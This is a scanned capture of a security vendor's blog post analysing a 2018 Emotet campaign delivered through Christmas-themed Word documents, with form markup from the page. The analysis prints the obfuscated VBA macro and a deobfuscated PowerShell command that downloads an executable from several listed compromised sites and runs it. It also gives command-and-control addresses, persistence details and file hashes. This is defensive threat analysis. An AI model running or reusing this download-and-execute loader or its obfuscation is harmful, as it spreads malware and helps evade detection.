www.picussecurity.com
Open in
urlscan Pro
2606:2c40::c73c:67e3
Public Scan
Submitted URL: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
Submission: On November 04 via api from US — Scanned from DE
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
Submission: On November 04 via api from US — Scanned from DE
Form analysis
2 forms found in the DOMPOST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638" enctype="multipart/form-data"
id="hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" method="POST"
class="hs-form stacked hs-custom-form hs-form-private hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_b6344b50-97a1-4ada-831d-cce1fea05768"
data-form-id="10a2d0b0-9f91-4cd7-a1e0-1cff39706638" data-portal-id="7048931" target="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" data-reactid=".hbspt-forms-0" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$0"><label id="label-email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="" placeholder="Enter your "
for="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" data-reactid=".hbspt-forms-0.1:$0.0"><span data-reactid=".hbspt-forms-0.1:$0.0.0"></span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$0.$email"><input id="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-input" type="email" name="email" required="" placeholder="Email*" value="" autocomplete="email"
data-reactid=".hbspt-forms-0.1:$0.$email.0" inputmode="email"></div>
</div>
<div class="hs_blog_resources_35190412163_subscription hs-blog_resources_35190412163_subscription hs-fieldtype-radio field hs-form-field" style="display:none;" data-reactid=".hbspt-forms-0.1:$1"><label
id="label-blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="" placeholder="Enter your Notification Frequency" for="blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259"
data-reactid=".hbspt-forms-0.1:$1.0"><span data-reactid=".hbspt-forms-0.1:$1.0.0">Notification Frequency</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$1.$blog_resources_35190412163_subscription"><input name="blog_resources_35190412163_subscription" class="hs-input" type="hidden" value=""
data-reactid=".hbspt-forms-0.1:$1.$blog_resources_35190412163_subscription.0"></div>
</div>
<div class="legal-consent-container" data-reactid=".hbspt-forms-0.2">
<div data-reactid=".hbspt-forms-0.2.1:0">
<div class="hs-dependent-field" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688">
<div class="hs_LEGAL_CONSENT.subscription_type_8300688 hs-LEGAL_CONSENT.subscription_type_8300688 hs-fieldtype-booleancheckbox field hs-form-field"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<ul class="inputs-list" required="" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0">
<li class="hs-form-booleancheckbox" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0"><label
for="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-form-booleancheckbox-display"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0"><input
id="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_8300688" value="true"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.0"><span
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.1">
<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.1"></legend>
</div>
<div class="hs-richtext" data-reactid=".hbspt-forms-0.2.3">
<p>By clicking the button below, you agree our <a href="https://www.picussecurity.com/privacy" target="_blank">Privacy Policy</a>.</p>
</div>
</div>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-0.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-0.5.1"><input type="submit" value="Subscribe" class="hs-button primary large" data-reactid=".hbspt-forms-0.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-0.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":3812.4000000953674,"rumServiceResponseTime":5207.200000286102,"rumFormRenderTime":6.799999713897705,"rumTotalRenderTime":5218.400000095367,"rumTotalRequestTime":1381.7000002861023,"legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":8300688,\"label\":\"<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By clicking the button below, you agree our <a href=\\\"https://www.picussecurity.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a>.</p>\",\"processingConsentCheckboxLabel\":\"<p>I have read the <a href=\\\"https://www.picussecurity.com/hubfs/GDPR%20-%20KVKK%20-%20Privacy%20Docs/Picus_Clarification%20Text.pdf\\\">Clarification Text</a> related to Protection and Processing of Personal Data. I agree that the information that I will provide by filling out this form will be processed under the GDPR and the Personal Data Protection Law No. 6698 in accordance with the conditions specified in the specified in the Clarification Text related to Protection and Processing of Personal Data.</p>\",\"isLegitimateInterest\":false}","embedAtTimestamp":"1667598194303","formDefinitionUpdatedAt":"1648106334310","pageUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageTitle":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","source":"FormsNext-static-5.548","sourceName":"FormsNext","sourceVersion":"5.548","sourceVersionMajor":"5","sourceVersionMinor":"548","timestamp":1667598194309,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36","originalEmbedContext":{"portalId":"7048931","formId":"10a2d0b0-9f91-4cd7-a1e0-1cff39706638","formInstanceId":"6259","pageId":"35193567243","region":"na1","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","target":"#hs_form_target_form_499516891","contentType":"blog-post","formsBaseUrl":"/_hcms/forms/","formData":{"cssClass":"hs-form stacked hs-custom-form"}},"canonicalUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageId":"35193567243","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_8300688","formInstanceId":"6259","renderedFieldsIds":["email","LEGAL_CONSENT.subscription_type_8300688"],"formTarget":"#hs_form_target_form_499516891","correlationId":"f472caba-cb5c-4073-bbaa-bd699bbe3c62","contentType":"blog-post","hutk":"c964860ea740212498cd4a72f92d3d1c","captchaStatus":"NOT_APPLICABLE","isHostedOnHubspot":true}"
data-reactid=".hbspt-forms-0.7"><iframe name="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" style="display:none;" data-reactid=".hbspt-forms-0.8"></iframe>
</form>
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638" enctype="multipart/form-data"
id="hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" method="POST"
class="hs-form stacked hs-custom-form hs-form-private hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_e4247ff3-315a-4c94-8b44-4bb328bf0e83"
data-form-id="10a2d0b0-9f91-4cd7-a1e0-1cff39706638" data-portal-id="7048931" target="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" data-reactid=".hbspt-forms-1" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-1.1:$0"><label id="label-email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="" placeholder="Enter your "
for="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" data-reactid=".hbspt-forms-1.1:$0.0"><span data-reactid=".hbspt-forms-1.1:$0.0.0"></span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.1:$0.$email"><input id="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-input" type="email" name="email" required="" placeholder="Email*" value="" autocomplete="email"
data-reactid=".hbspt-forms-1.1:$0.$email.0" inputmode="email"></div>
</div>
<div class="hs_blog_resources_35190412163_subscription hs-blog_resources_35190412163_subscription hs-fieldtype-radio field hs-form-field" style="display:none;" data-reactid=".hbspt-forms-1.1:$1"><label
id="label-blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="" placeholder="Enter your Notification Frequency" for="blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489"
data-reactid=".hbspt-forms-1.1:$1.0"><span data-reactid=".hbspt-forms-1.1:$1.0.0">Notification Frequency</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.1:$1.$blog_resources_35190412163_subscription"><input name="blog_resources_35190412163_subscription" class="hs-input" type="hidden" value=""
data-reactid=".hbspt-forms-1.1:$1.$blog_resources_35190412163_subscription.0"></div>
</div>
<div class="legal-consent-container" data-reactid=".hbspt-forms-1.2">
<div data-reactid=".hbspt-forms-1.2.1:0">
<div class="hs-dependent-field" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688">
<div class="hs_LEGAL_CONSENT.subscription_type_8300688 hs-LEGAL_CONSENT.subscription_type_8300688 hs-fieldtype-booleancheckbox field hs-form-field"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<ul class="inputs-list" required="" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0">
<li class="hs-form-booleancheckbox" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0"><label
for="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-form-booleancheckbox-display"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0"><input
id="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_8300688" value="true"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.0"><span
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.1">
<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display:none;" data-reactid=".hbspt-forms-1.2.1:0.1"></legend>
</div>
<div class="hs-richtext" data-reactid=".hbspt-forms-1.2.3">
<p>By clicking the button below, you agree our <a href="https://www.picussecurity.com/privacy" target="_blank">Privacy Policy</a>.</p>
</div>
</div>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-1.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-1.5.1"><input type="submit" value="Subscribe" class="hs-button primary large" data-reactid=".hbspt-forms-1.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-1.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":3812.4000000953674,"rumServiceResponseTime":5208.700000286102,"rumFormRenderTime":1.5999999046325684,"rumTotalRenderTime":5255.700000286102,"rumTotalRequestTime":1380.5,"legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":8300688,\"label\":\"<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By clicking the button below, you agree our <a href=\\\"https://www.picussecurity.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a>.</p>\",\"processingConsentCheckboxLabel\":\"<p>I have read the <a href=\\\"https://www.picussecurity.com/hubfs/GDPR%20-%20KVKK%20-%20Privacy%20Docs/Picus_Clarification%20Text.pdf\\\">Clarification Text</a> related to Protection and Processing of Personal Data. I agree that the information that I will provide by filling out this form will be processed under the GDPR and the Personal Data Protection Law No. 6698 in accordance with the conditions specified in the specified in the Clarification Text related to Protection and Processing of Personal Data.</p>\",\"isLegitimateInterest\":false}","embedAtTimestamp":"1667598194289","formDefinitionUpdatedAt":"1648106334310","pageUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageTitle":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","source":"FormsNext-static-5.548","sourceName":"FormsNext","sourceVersion":"5.548","sourceVersionMajor":"5","sourceVersionMinor":"548","timestamp":1667598194294,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36","originalEmbedContext":{"portalId":"7048931","formId":"10a2d0b0-9f91-4cd7-a1e0-1cff39706638","formInstanceId":"2489","pageId":"35193567243","region":"na1","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","target":"#hs_form_target_form_690212663-1667548330192","contentType":"blog-post","formsBaseUrl":"/_hcms/forms/","formData":{"cssClass":"hs-form stacked hs-custom-form"}},"canonicalUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageId":"35193567243","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_8300688","formInstanceId":"2489","renderedFieldsIds":["email","LEGAL_CONSENT.subscription_type_8300688"],"formTarget":"#hs_form_target_form_690212663-1667548330192","correlationId":"573d4a8e-55d7-41aa-a40f-81857600fcc4","contentType":"blog-post","hutk":"c964860ea740212498cd4a72f92d3d1c","captchaStatus":"NOT_APPLICABLE","isHostedOnHubspot":true}"
data-reactid=".hbspt-forms-1.7"><iframe name="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" style="display:none;" data-reactid=".hbspt-forms-1.8"></iframe>
</form>
Text Content
This site uses cookies. We use them to collect information about how you interact with our website and help us to improve your experience. By clicking “Accept”, you agree to the use of all cookies. You can opt-out or change your settings by clicking on “Cookie Settings”. You can find out more in our Privacy Policy. Cookie settings Accept Decline All Login Login Platform PLATFORM * Platform * Security Control Validation * Attack Path Validation * Detection Rule Validation * USE CASES * Security Posture Management * Security Control Validation * Security Control Rationalization * Enhancing Detection Efficacy * Compliance Enablement HOW TO BE A THREAT-CENTRIC? To stay ahead of changing threat landscape, a mindset shift is needed Integrations INTEGRATIONS * View all Integrations * Network Security Technologies * Security Incident and Event Management (SIEM) * Endpoint Detection and Response (EDR) * Security Orchestration, Automation and Response (SOAR) YOUR ULTIMATE GUIDE: THE BAS CHECKLIST Choosing the right Breach and Attack Simulation Company Partners PARTNER PROGRAM * About the Partner Program * Become a Picus Partner * Partner Portal TECHNOLOGY ALLIANCES * Technology Alliance Partner (TAP) Program and Benefits ACHIEVING A THREAT-CENTRIC APPROACH WITH BAS To stay ahead of changing threat landscape, a mindset shift is needed Resources TOP VULNERABILITIES ACTIVELY EXPLOITED BY CHINESE STATE-SPONSORED APT ACTORS LV RANSOMWARE ANALYSIS AND SIMULATION * View all Resources * Blog * Purple Academy * Webinars * Case Studies & Reports * Press Releases * MITRE ATT&CK HOW BAS WORKS AND WHY IT MATTERS Breach and attack simulation—why it is crucial to your cybersecurity START YOUR FREE TRIAL Contact Us THE CHRISTMAS CARD YOU NEVER WANTED - A NEW WAVE OF EMOTET IS BACK TO WREAK HAVOC Suleyman Ozarslan, PhD | December 22, 2018 KEEP UP TO DATE WITH LATEST BLOG POSTS Notification Frequency * I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus. * By clicking the button below, you agree our Privacy Policy. Cybercriminals take advantage of the holidays to improve their malware distribution rate. We have spotted samples with Christmas-themed filenames, such as ChristmasCard.doc, Christmas-Greeting-Card.doc, Christmas-wishes.doc, and Christmas-Congratulation.doc. When we analyzed the obtained malicious documents, we saw that they download the infamous Emotet malware, which is a modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. So, Emotet continues to affect governments, the private and public sectors. INITIAL ACCESS The specific sample analyzed below is the ChristmasCard.doc (SHA256: 1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC). When a victim opens the document, Microsoft Word asks to enable/disable macros. It reveals that a macro is embedded in the document. When a user opens the document, it claims that it was created in an earlier version of Microsoft Office and asks the victim to enable the content, which launches the code hidden in the macros. EXECUTION VBA (Visual Basic for Applications) codes in the embedded macro are given below: Function EiDJKjLt() On Error Resume Next kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15), nAwUAJnM) Select Case vhWrwwLHwhINhj Case 21458470 vtPEXawqKYqTzo = 205771406 bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(298339837) - lOTYOWtjKGpLOXPb / Hex(328677453))) MsgBox (bJOUowYROCUnaEvkFGjfFijV) End Select End Function The macro includes obfuscated VBA codes to evade security controls. The most interesting part of the macro is: Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15) In this malicious macro, Interaction.Shell method runs an executable program written in TextBox1. However, TextBox1 is not seen by the victim, it is hidden in the document. We used the Debug.Print method to see the content of the Textbox1, and accessed the following code that is executed by the Interaction.Shell method: c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%" We see a heavily obfuscated code to make detection difficult, the only clear part of the code is c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe. As seen on this part of the code, three random directories are added after c:\ to bypass weak security controls, then three \.. are added to traverse back to c:\. Therefore, the obtained path is c:\windows\system32\cmd.exe that runs the subsequent commands. However, those commands are also obfuscated: "set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%" The second and third commands are interesting: for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%" Briefly, these commands print 497 characters long XhOY variable in reverse order. Let’s look at XhOY variable: 'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop And, XhOY variable in reverse order: powershell $KSv='\DfV'\;$ohl=new-object Net.WebClient;$lIY='\http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'\.Split('\@'\);$svv='\mba'\;$iro = '\150'\;$FBp='\Wjn'\;$kjh=$env:temp+'\\\'\+$iro+'\.exe'\;foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='\ORc'\;If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='\iGG'\;break;}}catch{}}$HTB='\tWJ'\ Now, we can see it is a PowerShell command, but it is obfuscated by using variable substitution and garbage variable assignments. Even so, we can reveal the following command by removing the garbage variables, and putting the values of the variables where they exist. powershell foreach($wFR in http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'\.Split('\@'\)){try{new-object Net.WebClient.DownloadFile($wFR, $env:temp+'\150'\+'\.exe'\);If ((Get-Item $env:temp+'\150'\+'\.exe'\).length -ge 80000) {Invoke-Item $env:temp+'\150'\+'\.exe'\;break;}}catch{}} Briefly, this command tries to download 150.exe from the following addresses in given order via the Net.WebClient.DownloadFile method. Then, if the file is downloaded successfully it executes the downloaded file by using the Invoke-Item cmdlet, and exits the loop. It differentiates a successful file download by comparing the length of the file with -ge 80000 (ge: greater or equal than). http://www.ideenweberei.com/L9NXvhd http://www.capbangkok.com/p1SolwJv http://www.trinityriveroutfitters.com/W4CGsWIzI http://www.hayashitoysmart.com/add_favorites/XJJSoydNv http://cleeft.nl/60ILq1CgH When we started to examine the 150.exe file (SHA256: 5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized that it is the infamous Emotet trojan. As expected from an Emotet sample, it tries to download a file from the following locations: 213.120.119.231:8443 78.189.21.131:80 187.140.90.91:8080 81.150.17.158:50000 1.150.17.158:8443 201.190.150.60:443 After a few failed attempts, it downloaded archivesymbol.exe (SHA256: 5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) file from 201.190.150.60:443 to C:\Users\admin\AppData\Local\archivesymbol\ folder. Emotet artifacts usually mimic the names of known executables. In order to become persistent on the victim system, Archivesymbol.exe adds its full path to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key in the Registry. CONCLUSION In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload. Commands in the macro are heavily obfuscated for defense evasion. With the Email Threat Simulation (ETS) Module, Picus customers are able to test their network and client security systems' blocking performance against any malicious email, without waiting for infected by malware such as Emotet. In addition, using the Picus Endpoint Simulation Module (ESM), you can challenge your endpoint security controls against a wide range of threats, from basic attacks to Advanced Persistent Threats (APTs), with up-to-date attack techniques mapped to MITRE’s ATT&CK framework. As a conclusion, you can continuously verify and improve your security measures by utilizing the most practical, quick-to-apply, and immediate mitigation actions provided by Picus. If you want to know how your enterprise security devices are blocking these attacks, you can contact us at demo@picussecurity.com. Within a few hours, we can quickly report to you how your network security systems protect against Emotet and other current cyber attacks! PROCESS GRAPH MITRE’S ATT&CK TECHNIQUES OBSERVED Initial Access Execution Persistence Defense Evasion Discovery Command and Control T1193 Spearphishing Attachment T1059 Command-Line Interface T1060 Registry Run Keys / Startup Folder T1140 Deobfuscate/Decode Files or Information T1012 Query Registry T1071 Standard Application Layer Protocol T1192 Spearphishing Link T1086 PowerShell T1050 New Service T1112 Modify Registry T1082 System Information Discovery T1065 Uncommonly Used Port 1035 Service Execution T1057 Process Discovery T1106 Execution through API T1010 Application Window Discovery T1137 Office Application Startup T1064 Scripting INDICATOR OF COMPROMISES (IOC) DELIVERY DOCUMENTS 1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC 216C7C9300632A99D808AC6C2BA26A53402AC584504BB7EAC3CBE35B56994D93 2563D86BB358D86D06856A5BECDCAD5B6461D88FDD49E362691D5DFAE43C4625 3B0609646D8FFC097DFEEFF7FC70A52B38C4AE53D93DE6FB96A1B1119E51DB4F 3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF 4030D19135210C191D7761A432B295314588519A0D3497BEA401F6488C7DE445 